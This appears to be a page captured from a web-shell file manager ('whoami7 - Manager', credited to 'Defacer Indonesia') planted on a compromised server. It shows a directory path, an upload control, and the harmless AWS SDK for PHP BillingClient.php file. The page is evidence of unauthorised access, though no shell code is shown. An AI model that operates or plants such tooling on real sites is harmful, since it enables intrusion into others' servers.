whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
vendor
/
aws
/
aws-sdk-php
/
src
/
Billing
/
Upload File:
files >> //home/kckglobal/www/portal/vendor/aws/aws-sdk-php/src/Billing/BillingClient.php
<?php namespace Aws\Billing; use Aws\AwsClient; /** * This client is used to interact with the **AWS Billing** service. * @method \Aws\Result createBillingView(array $args = []) * @method \GuzzleHttp\Promise\Promise createBillingViewAsync(array $args = []) * @method \Aws\Result deleteBillingView(array $args = []) * @method \GuzzleHttp\Promise\Promise deleteBillingViewAsync(array $args = []) * @method \Aws\Result getBillingView(array $args = []) * @method \GuzzleHttp\Promise\Promise getBillingViewAsync(array $args = []) * @method \Aws\Result getResourcePolicy(array $args = []) * @method \GuzzleHttp\Promise\Promise getResourcePolicyAsync(array $args = []) * @method \Aws\Result listBillingViews(array $args = []) * @method \GuzzleHttp\Promise\Promise listBillingViewsAsync(array $args = []) * @method \Aws\Result listSourceViewsForBillingView(array $args = []) * @method \GuzzleHttp\Promise\Promise listSourceViewsForBillingViewAsync(array $args = []) * @method \Aws\Result listTagsForResource(array $args = []) * @method \GuzzleHttp\Promise\Promise listTagsForResourceAsync(array $args = []) * @method \Aws\Result tagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise tagResourceAsync(array $args = []) * @method \Aws\Result untagResource(array $args = []) * @method \GuzzleHttp\Promise\Promise untagResourceAsync(array $args = []) * @method \Aws\Result updateBillingView(array $args = []) * @method \GuzzleHttp\Promise\Promise updateBillingViewAsync(array $args = []) */ class BillingClient extends AwsClient {}
Copyright ©2021 || Defacer Indonesia